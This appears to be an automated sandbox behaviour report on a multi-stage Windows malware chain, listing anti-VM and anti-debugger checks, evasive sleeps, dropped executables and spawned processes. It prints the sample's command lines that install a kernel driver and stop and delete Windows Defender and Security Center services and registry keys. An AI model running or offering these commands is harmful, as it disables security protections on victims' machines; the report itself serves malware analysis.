Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 4F2047 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 4F0858 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Special instruction interceptor: First address: 587FD4 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\SUAosT64HD.exe

Code function: 1_2_055200F4 rdtsc

1_2_055200F4

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1333	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 1694	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1177	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1104	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1085	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1179	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window / User API: threadDelayed 1145	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Or1ARiR[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\xZRvIQ5[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ssisd.sys	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8336	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8336	Thread sleep time: -64032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8308	Thread sleep count: 1333 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8308	Thread sleep time: -2667333s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8332	Thread sleep count: 274 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8332	Thread sleep time: -548274s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8296	Thread sleep count: 173 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8296	Thread sleep time: -5190000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8532	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8328	Thread sleep count: 1694 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8328	Thread sleep time: -3389694s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8328	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8328	Thread sleep time: -70035s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8320	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8320	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 604	Thread sleep count: 1177 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 604	Thread sleep time: -2355177s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1652	Thread sleep count: 1104 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1652	Thread sleep time: -2209104s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1364	Thread sleep count: 1085 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1364	Thread sleep time: -2171085s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1156	Thread sleep count: 1179 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1156	Thread sleep time: -2359179s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1936	Thread sleep count: 213 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1936	Thread sleep time: -6390000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3432	Thread sleep count: 1145 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3432	Thread sleep time: -2291145s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\22.exe TID: 4056	Thread sleep count: 332 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SUAosT64HD.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: rapes.exe, rapes.exe, 00000008.00000002.1534686061.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, axplong.exe, 0000000A.00000002.1854681754.000000000086E000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 0000000B.00000002.2559913702.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: apple.exe, 0000000E.00000002.1931013800.0000000006DF3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22
Source: 22.exe, 00000013.00000002.2064569844.0000000000748000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWQ
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2565136945.0000000000E99000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2565136945.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW H
Source: SUAosT64HD.exe, 00000001.00000002.1365221436.000000000068E000.00000040.00000001.01000000.00000004.sdmp, axplong.exe, 00000002.00000002.2561109533.000000000086E000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.1437821741.000000000086E000.00000040.00000001.01000000.00000007.sdmp, 3d9778a1ff.exe, 00000004.00000002.1486447124.000000000091D000.00000040.00000001.01000000.00000009.sdmp, rapes.exe, 00000007.00000002.1535218979.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 00000008.00000002.1534686061.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 0000000A.00000002.1854681754.000000000086E000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 0000000B.00000002.2559913702.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\SUAosT64HD.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\SUAosT64HD.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\SUAosT64HD.exe

Code function: 1_2_055200F4 rdtsc

1_2_055200F4

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004D645B mov eax, dword ptr fs:[00000030h]	1_2_004D645B
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004DA1C2 mov eax, dword ptr fs:[00000030h]	1_2_004DA1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006BA1C2 mov eax, dword ptr fs:[00000030h]	2_2_006BA1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006B645B mov eax, dword ptr fs:[00000030h]	2_2_006B645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006BA1C2 mov eax, dword ptr fs:[00000030h]	3_2_006BA1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006B645B mov eax, dword ptr fs:[00000030h]	3_2_006B645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006BA1C2 mov eax, dword ptr fs:[00000030h]	10_2_006BA1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006B645B mov eax, dword ptr fs:[00000030h]	10_2_006B645B

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe "C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe "C:\Users\user\AppData\Local\Temp\10357800101\apple.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe "C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B75.tmp\5B86.tmp\5B87.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5CCD.tmp\5CCE.tmp\5CCF.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "WdNisSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "WdNisSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "Sense"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "Sense"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "wscsvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "wscsvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: rapes.exe, rapes.exe, 00000008.00000002.1534686061.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000B.00000002.2559913702.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: eProgram Manager
Source: axplong.exe, axplong.exe, 0000000A.00000002.1854984627.00000000008B4000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: ;@Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 2_2_0069DCC1 cpuid

2_2_0069DCC1

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe VolumeInformation	Jump to behavior
